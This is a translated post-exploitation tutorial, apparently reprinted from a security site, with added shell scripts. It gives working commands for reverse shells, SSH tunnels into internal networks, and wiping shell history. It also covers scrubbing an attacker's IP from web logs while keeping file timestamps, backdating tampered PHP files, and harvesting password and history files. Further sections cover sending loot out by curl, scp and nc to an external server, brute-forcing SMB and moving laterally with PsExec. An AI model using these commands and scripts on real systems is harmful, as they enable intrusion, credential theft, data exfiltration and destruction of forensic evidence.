Penetration testing in a variety of environments

Source: Internet
Author: User
Tags: socket, connect, ssh, server

Reprint Source: http://drops.wooyun.org/tips/411

Getshell:

Once you have found the entry point, the first thing is to pop a shell. I normally use back.py

together with nc (the nc listener side needs no explanation).

back.py automatically clears all history, so the shell session does not end up in bash_history when the connection is lost.

Various SSH tricks

Reverse-forwarding an intranet port:

Three ssh parameters matter here:

-f: go to the background once the connection is up, so it does not occupy the current shell and keeps running if that shell is lost; roughly equivalent to nohup and &.
-N: do not request a shell or run any command after connecting (why this matters is explained below).
-R: forward a port reachable from the local side (on the machine itself, anywhere on the intranet, or even an external host) so that it is exposed on the SSH server.

Usage:

First you need an SSH server with a public IP. If the target network restricts outbound ports, also listen on a common port such as 80 or 443: either change Port in sshd_config or add an iptables redirect. You need root on this server. Enable port forwarding in sshd_config with AllowTcpForwarding yes and GatewayPorts yes; GatewayPorts is what makes a -R port listen on all of the server's interfaces instead of 127.0.0.1 only. If these were not enabled before, restart sshd.

Also, because a reverse forward means the target machine logs in to your SSH server, create a dedicated forwarding user for safety: useradd the account, set its password, then edit its line in /etc/passwd and change the shell after the last ':' to /sbin/nologin or /bin/false. Even if someone on the target side logs that SSH password, they can then do nothing on your forwarding server (such as forensics against it).

What -N is for:

The forwarding user has no shell, so without -N ssh would disconnect immediately because no shell can be started; -N avoids this.

Start forwarding:

ssh -fNR <port to open on the server>:<target host: the compromised machine itself, or any internal or external IP>:<target port> <forwarding user>@<your SSH server IP>

It prompts for the forwarding user's password; once that is accepted, ssh drops into the background.

Example 1:

Local port forwarding: the target machine runs Oracle on port 1521, but it is only reachable from the intranet. You have not escalated privileges, sqlplus and similar tools are not installed, database management through the webshell keeps throwing errors, but you have found a login username and password. And your own machine has Navicat for Oracle. The port-forwarding user on the SSH server is named forward and the server IP is 123.123.123.123:

ssh -fNR 11521:127.0.0.1:1521 forward@123.123.123.123

Note: port 11521 is used on the server because ports below 1024 can only be bound by root. Also make sure the port you open on the server is not blocked by iptables, otherwise you will not be able to reach it from outside (obviously).

Once the tunnel is up, open Navicat, create a new connection, enter 123.123.123.123 as the IP and 11521 as the port, then the username and password, and it connects.
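Before launching the tunnel it is worth checking that the server side really is set up as described above. The following is an added example, not code from the original article: it reads an sshd_config and a passwd-format file passed as arguments (so it can be run against copies) and applies OpenSSH's first-value-wins rule. The sample files are constructed here, and it assumes plain "Key value" or "Key=value" lines with no Include directives; Match blocks are not evaluated.

```shell
#!/bin/sh
# Added pre-flight check for the reverse-forward server (not code from the original article).
# It works on an sshd_config and a passwd-format file given as arguments, so it can be run
# against copies; the sample files below are constructed. Assumption: plain "Key value" or
# "Key=value" lines, no Include directives, and Match blocks are not evaluated.

# sshd_option CONFIG KEYWORD : print the first global value of KEYWORD (keyword match is
# case-insensitive, as in sshd); prints nothing if it is not set.
sshd_option() {
    key=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    awk -F '[ \t=]+' -v key="$key" '
        { sub(/^[ \t]+/, "") }
        /^#/ || NF == 0 { next }
        tolower($1) == "match" { exit }        # conditional section starts: stop here
        tolower($1) == key { print $2; exit }  # sshd keeps the first value it sees
    ' "$1"
}

# sshd_effective CONFIG KEYWORD : the value with the OpenSSH default applied when unset.
sshd_effective() {
    v=$(sshd_option "$1" "$2" | tr 'A-Z' 'a-z')
    case "$(printf '%s' "$2" | tr 'A-Z' 'a-z')" in
        allowtcpforwarding) printf '%s\n' "${v:-yes}" ;;
        gatewayports)       printf '%s\n' "${v:-no}" ;;
        *)                  printf '%s\n' "$v" ;;
    esac
}

# forward_ready CONFIG : exit 0 if "ssh -R port:host:port" will be accepted AND the port
# will be reachable from outside; otherwise print the reason and exit 1.
forward_ready() {
    case "$(sshd_effective "$1" AllowTcpForwarding)" in
        yes|all|remote) ;;
        *) echo "AllowTcpForwarding rejects -R"; return 1 ;;
    esac
    case "$(sshd_effective "$1" GatewayPorts)" in
        yes)             echo "ok: -R ports listen on all server interfaces" ;;
        clientspecified) echo "ok, but bind explicitly: -R 0.0.0.0:PORT:host:port" ;;
        *)               echo "GatewayPorts is no: -R ports bind to 127.0.0.1 on the server only"; return 1 ;;
    esac
}

# user_shell PASSWD_FILE USER : print the login shell of USER.
user_shell() {
    awk -F: -v u="$2" '$1 == u { print $NF; exit }' "$1"
}

# forward_user_locked PASSWD_FILE USER : exit 0 if USER cannot get an interactive shell,
# which is what editing the shell field to /sbin/nologin or /bin/false achieves.
forward_user_locked() {
    case "$(user_shell "$1" "$2")" in
        /sbin/nologin|/usr/sbin/nologin|/bin/false) return 0 ;;
        *) return 1 ;;
    esac
}

# make_samples DIR : constructed sshd_config and passwd samples for the demo.
make_samples() {
    cat > "$1/sshd_config.bad" <<'EOF'
# forwarding is on, but GatewayPorts is left at its default of no, so
# "ssh -R 11521:127.0.0.1:1521 ..." would only listen on the server's loopback
Port 443
AllowTcpForwarding yes
#GatewayPorts no
EOF
    cat > "$1/sshd_config.good" <<'EOF'
Port 443
AllowTcpForwarding yes
GatewayPorts yes
# a later duplicate does not override the first value
GatewayPorts no
Match User forward
    AllowTcpForwarding remote
EOF
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
forward:x:1001:1001::/home/forward:/sbin/nologin
backup:x:1002:1002::/home/backup:/bin/bash
EOF
}

# Demo
d=$(mktemp -d)
make_samples "$d"
forward_ready "$d/sshd_config.good"
forward_ready "$d/sshd_config.bad" || true
forward_user_locked "$d/passwd" forward && echo "forward: no interactive shell, safe to hand out"
rm -rf "$d"
```

Run forward_ready against the real /etc/sshd_config on your server (or a copy of it) and forward_user_locked against /etc/passwd before you type the ssh -fNR command on the target; a GatewayPorts failure is the usual reason a tunnel "works" but nothing answers on the server's public address.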

Example 2:

Forwarding another intranet IP: besides localhost, you can forward any other host and port on the intranet, even on a different network segment, as long as it is reachable from the compromised machine. For example, there is a Windows server on the intranet at 192.168.5.10 with port 3389 open, again only reachable from the intranet:

ssh -fNR 13389:192.168.5.10:3389 forward@123.123.123.123

Once the tunnel is up, mstsc to 123.123.123.123:13389 works.

You can open as many forwards as you like; just make sure the ports forwarded to your server do not collide.

When you are done, remember to tear it down:

ps aux | grep ssh

You will see the ssh forwarding command in the process list; kill that PID. Alternatively, kill it on the SSH server side, where the session shows up in

netstat -anp | grep sshd

ssh also records your server in known_hosts, so when you clean up at the end, remember to clear known_hosts in the .ssh directory of the home folder of the user you ran ssh as on the target.

Reverse-forwarding a SOCKS5 proxy over SSH

ssh has a built-in SOCKS5 server (-D). To use it you need an account on the target that can log in to its own sshd; it need not be root, but it must be able to log in (not nologin), and if it is not root the SOCKS port must be above 1024. The idea is to start the SOCKS5 server locally first and then reverse-forward the local SOCKS5 port to the remote server.

Usage:

ssh -fND 127.0.0.1:8080 user@127.0.0.1

(user is any local account that can log in.) This starts a SOCKS5 proxy on local port 8080; then forward it back out:

ssh -fNR 18080:127.0.0.1:8080 forward@123.123.123.123

The SOCKS5 proxy is now reachable on 123.123.123.123 port 18080, and you can point proxychains or any other SOCKS5-capable tool at it to explore the intranet as far as it goes. (With OpenSSH 7.6 or newer on the target, the two steps collapse into one: a -R with only a listening port and no destination makes the server side a SOCKS proxy tunnelled back through the target.)

Hiding traces on Linux

If you got the shell by some other means, clear the history environment variables such as HISTFILE:

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null;

After you log in over SSH, an administrator running w sees the current logged-in users, so you need to hide from that as well; Xi4oyu's logtamper is recommended.

Clearing log contents:

The log must be in text format, and you must have read and write permission on it.

awk '!/pattern/' filename > temp && mv temp filename

In plain terms this filters the specified content out of the original file into a new file and then overwrites the old file with the new one; afterwards remember to restore the original attributes with chmod (and chown, since the new file is owned by you). Two caveats: the pattern is a regular expression, so the dots in an IP match any character unless escaped, and mv replaces the file's inode, so a daemon that still has the old log open keeps writing into the unlinked old file and nothing reaches the new one until it reopens its log. Writing the filtered content back into the existing file instead of using mv avoids that. Example:

awk '!/123.123.123.123/' /var/log/httpd/access_log > temp && mv temp /var/log/httpd/access_log

removes every log line containing 123.123.123.123. Several keywords can be matched at once:

awk '!/123.123.123.123|111.111.111.111|phpspy.php/' /var/log/httpd/access_log > temp && mv temp /var/log/httpd/access_log

Changing a file's access / modification time:

touch -t 200901231532 filename

sets it to 23 January 2009 15:32. Note that this only sets atime and mtime; the inode change time (ctime) is updated to the current time by the touch itself and cannot be set from user space, so stat still shows when the file was last touched.

Batch modification:

For example, you have modified a lot of PHP files in a folder, inserting a bunch of code into each:

touch -t 200901231532 *

changes the times of all files in the current directory.
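As an added example covering both the awk log filtering and the touch -t backdating above (not code from the original article), here is an in-place version: it keeps the log's inode, owner and mode, puts atime and mtime back afterwards, matches the patterns literally, and backdates a tree of files. The log lines are constructed samples; it assumes GNU coreutils for touch -r and date -r, and a daemon that opens its log with O_APPEND, as Apache does, so that truncating and rewriting the file does not corrupt it.

```shell
#!/bin/sh
# Added example (not code from the original article): the awk log filtering and the
# touch -t backdating above, done in place. Sample log lines are constructed.
# Assumptions: GNU coreutils (touch -r, date -r) and a daemon that opens its log with
# O_APPEND, as Apache does, so truncating and rewriting the file does not corrupt it.

# make_sample_log FILE : write a constructed Apache-style access log.
make_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [23/Jan/2009:15:30:01 +0800] "GET /index.php HTTP/1.1" 200 512
123.123.123.123 - - [23/Jan/2009:15:31:10 +0800] "GET /phpspy.php HTTP/1.1" 200 2048
10.0.0.7 - - [23/Jan/2009:15:31:55 +0800] "POST /login.php HTTP/1.1" 302 0
111.111.111.111 - - [23/Jan/2009:15:32:20 +0800] "GET /admin/ HTTP/1.1" 403 120
10.0.0.5 - - [23/Jan/2009:15:33:00 +0800] "GET /uploads/phpspy.php HTTP/1.1" 200 2048
EOF
}

# scrub_log LOG PATTERN... : delete every line containing any PATTERN and print how many
# lines were removed. Patterns are matched literally (dots escaped), unlike the bare awk
# regex in the article, so 123.123.123.123 cannot also match 1231123112311230.
scrub_log() {
    log=$1; shift
    [ $# -gt 0 ] || { echo "usage: scrub_log LOG PATTERN..." >&2; return 1; }
    [ -r "$log" ] && [ -w "$log" ] || { echo "need read+write on $log" >&2; return 1; }
    pat=""
    for p in "$@"; do
        esc=$(printf '%s' "$p" | sed 's/[.]/\\./g')
        pat="${pat:+$pat|}$esc"
    done
    tmp=$(mktemp) || return 1
    touch -r "$log" "$tmp"                  # remember the log's atime/mtime on the temp file
    # ENVIRON avoids awk's escape processing of -v values, so the backslashes survive
    PAT="$pat" awk '$0 !~ ENVIRON["PAT"]' "$log" > "$tmp.out" || { rm -f "$tmp" "$tmp.out"; return 1; }
    before=$(wc -l < "$log"); after=$(wc -l < "$tmp.out")
    # Write back through the existing inode instead of mv: the daemon keeps appending to
    # the same file, and owner and mode are untouched, so no chown/chmod repair is needed.
    cat "$tmp.out" > "$log"
    touch -r "$tmp" "$log"                  # restore atime/mtime (ctime still moves to now)
    rm -f "$tmp" "$tmp.out"
    echo $((before - after))
}

# backdate DIR STAMP [GLOB] : set atime/mtime of matching files under DIR to STAMP in
# touch -t form (YYYYMMDDhhmm). ctime cannot be set this way and still reveals the edit.
backdate() {
    find "$1" -type f -name "${3:-*}" -exec touch -t "$2" {} +
}

# stamp_of FILE : mtime as YYYYMMDDhhmm in local time, for checking the result.
stamp_of() {
    date -r "$1" +%Y%m%d%H%M
}

# Demo
d=$(mktemp -d)
make_sample_log "$d/access_log"
echo "removed $(scrub_log "$d/access_log" 123.123.123.123 111.111.111.111 phpspy.php) line(s)"
cat "$d/access_log"
printf '<?php /* injected */ ?>\n' > "$d/shell.php"
backdate "$d" 200901231532 '*.php'
echo "shell.php now dated $(stamp_of "$d/shell.php")"
rm -rf "$d"
```

Even with mtime restored, ctime on both the log and the backdated files now reads as the moment of the edit; that is the one timestamp this approach cannot hide, and a comparison of ctime against mtime is a standard forensic check.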

Information collection:

Reconstructed from the surviving /usr/share exclusion and pattern list (the command name itself did not survive in this copy, and the archive name is a placeholder), in the same find-into-zip shape as the config collection below:

find / -not -path "/usr/share/*" -regextype posix-extended -regex ".*\.sh$|.*\.pl$|.*\.py$|.*\.conf$|.*\.cnf$|.*\.ini$|.*/\..*history$|.*/\..*pass.*$|.*secret$" -print | zip collect.zip -@

This packs the various scripts and configuration files plus the shell history files. zip on some systems needs different options, so adjust as needed.

Collect all conf*.php files under /var and pack them:

find /var -name '*conf*.php' -print | zip config.zip -@

Find files containing specific content and show the matching lines:

grep -rPa --include=*.php '($PATTERNS)' $SEARCH_DIR

For example, to find every PHP file under the web directory that contains the word password:

grep -rPa --include=*.php 'password' /var

The pattern can be a regular expression, and the file-type filter can be dropped to search every file (very slow).
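An added, portable version of the collection commands above (not code from the original article): it uses GNU find with -regextype and -print0 and packs with GNU tar instead of zip, which is often missing on servers, and its grep uses -E rather than -P so it also works where grep has no PCRE support. The directory tree it runs against is constructed in make_tree and the file contents are invented for the demo.

```shell
#!/bin/sh
# Added example (not code from the original article): a portable version of the collection
# commands above. GNU find (-regextype, -print0) and GNU tar (--null -T -) are assumed;
# tar replaces zip, which is often missing on servers, and grep -E replaces -P so it works
# where grep has no PCRE. The directory tree and file contents are constructed for the demo.

# collect_files ROOT OUT_TGZ : archive scripts, configs, shell history and credential
# files under ROOT, skipping ROOT/usr/share as the article does, plus proc and sys and
# other filesystems (-xdev). NUL-separated paths survive spaces and newlines in names.
collect_files() {
    find "$1" -xdev -type f \
        -not -path "$1/usr/share/*" -not -path "$1/proc/*" -not -path "$1/sys/*" \
        -regextype posix-extended \
        -regex '.*\.(sh|pl|py|conf|cnf|ini)$|.*/\..*history$|.*/\..*pass.*$|.*secret$' \
        -print0 2>/dev/null \
    | tar --null -T - -czf "$2" 2>/dev/null
}

# list_archive OUT_TGZ : member names, one per line.
list_archive() {
    tar -tzf "$1"
}

# find_secrets ROOT : lines in PHP and config files that assign something password-like,
# e.g. $db_password = "..", 'password' => '..', password=.. or password: ..
find_secrets() {
    grep -rEain --include='*.php' --include='*.conf' --include='*.cnf' --include='*.ini' \
        -e "pass(word|wd)?['\"]?[[:space:]]*(=>?|:)" "$1"
}

# make_tree ROOT : constructed sample filesystem slice.
make_tree() {
    mkdir -p "$1/var/www/inc" "$1/home/admin" "$1/usr/share/doc" "$1/etc"
    printf '<?php $db_password = "S3cret!";\n' > "$1/var/www/inc/config.php"
    printf '<?php echo "hello";\n'              > "$1/var/www/index.php"
    printf '[client]\npassword=hunter2\n'       > "$1/etc/my.cnf"
    printf 'mysql -u root -phunter2\n'          > "$1/home/admin/.bash_history"
    printf '#!/bin/sh\necho backup\n'           > "$1/home/admin/backup.sh"
    printf 'passport number: 1\n'               > "$1/home/admin/notes.txt"
    printf 'ignored\n'                          > "$1/usr/share/doc/README.conf"
}

# Demo
d=$(mktemp -d)
make_tree "$d/root"
collect_files "$d/root" "$d/loot.tgz"
echo "archived:"; list_archive "$d/loot.tgz"
echo "credentials:"; find_secrets "$d/root"
rm -rf "$d"
```

On a real host call collect_files / out.tgz and find_secrets /var/www; the -xdev keeps find out of NFS mounts and /proc, which is where the unrestricted version of the one-liner tends to hang.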

File transfer:

Once you have found what you need, getting it out is the next problem. In general, large files go by FTP or scp, small ones by nc.

FTP method:

If the target has curl it is easy:

curl -v -T filename ftp://username:password@server/

scp method:

Suited to cases with an IDS and the like: sshd can be put on 443 as a conventional encrypted-traffic port (add -P 443 to scp in that case). The scp account needs a real login shell and write permission to the destination directory, so the nologin forwarding user cannot be used for this (user below stands for whatever account you created for scp).

scp backup.tgz user@123.123.123.123:/tmp/backup.tgz

nc method:

Listen first on the receiving server:

nc -l port > filename

Then, on the machine holding the file:

nc server_ip port < filename

Small files are fine; large files sometimes break mid-transfer. Some nc variants need -l -p port to listen and -q 1 on the sending side so that it exits at end of file; compare a checksum on both ends before deleting the source.

From Linux to Windows

Sometimes you have a shell on a Linux server and want to cross over to the Windows machines. There are basically two ways: exploit a vulnerable Windows service, or reuse the usernames and passwords collected on Linux and get a shell through PsExec.

First locate the Windows hosts and their open services. Scan the intranet for machines with 445 and 3389 open; those are almost always Windows. When scanning, whatever tool you use, scan with full TCP connects as far as possible: a SYN scan will certainly be noticed if the intranet has an IDS, whereas connect scans look much more like normal connections. Once you have the list of Windows machines, take the usernames and passwords collected on the Linux side plus some common weak passwords and build a password dictionary and a username dictionary, adding the usual Windows account names such as Administrator. Then try them against SMB directly from Linux with hydra. With luck, as soon as one password works you can get a shell with PsExec. Without luck, exploitation is the only option. If that is not possible either, and the Windows host is on the same segment as the Linux box, you can try to capture SMB authentication traffic by ARP spoofing and then crack the hashes offline or relay them; note that what you capture is a NetNTLM challenge-response, which can be cracked or relayed but not passed the way an NT hash can. This is noisy, so it is the last resort.
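As an added example, not from the original article, the full-connect sweep for 445/3389 recommended above can be done with nothing but bash's /dev/tcp, which matters on a foothold that has neither nmap nor nc. It assumes bash (for /dev/tcp) and GNU coreutils timeout; hosts come from stdin, PARALLEL is a variable name chosen here rather than a tool option, and the only address probed in the demo is loopback.

```shell
#!/bin/bash
# Added example (not code from the original article): a full-connect sweep for 445/3389 done
# with bash's /dev/tcp, for a foothold that has neither nmap nor nc. Assumes bash (for
# /dev/tcp) and GNU coreutils timeout. Hosts are read from stdin; the demo only probes
# loopback, and PARALLEL is a name chosen here, not a tool option.

# tcp_open HOST PORT [SECONDS] : exit 0 only if a complete TCP handshake succeeds.
# A full connect() looks like an ordinary client to an IDS, unlike a half-open SYN scan.
tcp_open() {
    timeout "${3:-2}" bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$1" "$2" 2>/dev/null
}

# sweep PORT... : read one host per line from stdin and print host:port for each open port.
# Hosts are probed in the background, at most ${PARALLEL:-32} at a time.
sweep() {
    ports="$*"; n=0
    while read -r host; do
        [ -n "$host" ] || continue
        {
            for p in $ports; do
                tcp_open "$host" "$p" 1 && echo "$host:$p"
            done
        } &
        n=$((n + 1))
        if [ "$n" -ge "${PARALLEL:-32}" ]; then wait; n=0; fi
    done
    wait
}

# expand_24 PREFIX : the 254 host addresses of PREFIX.0/24, e.g. expand_24 192.168.5
expand_24() {
    for i in $(seq 1 254); do echo "$1.$i"; done
}

# windows_hosts : reduce sweep output to the unique hosts that answered on any port.
windows_hosts() {
    cut -d: -f1 | sort -u
}

# Demo. "expand_24 192.168.5 | sweep 445 3389 | windows_hosts" would sweep the segment
# from the article; here only loopback is probed so nothing leaves this machine.
printf '127.0.0.1\n' | sweep 445 3389 | windows_hosts
```

The resulting host list is what you feed to hydra's SMB module; because every probe completes the handshake, each one shows up in the target's logs as a normal, if short, connection rather than as the half-open pattern SYN-scan signatures look for.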

PsExec

There are several options: Metasploit's psexec module (exploit/windows/smb/psexec), which can deliver an MSF reverse payload directly; reverse-forwarding the Windows server's port 445 and running PsExec from a Windows machine; or the Python psexec from impacket (https://code.google.com/p/impacket/) on a Linux machine that is directly on the network.
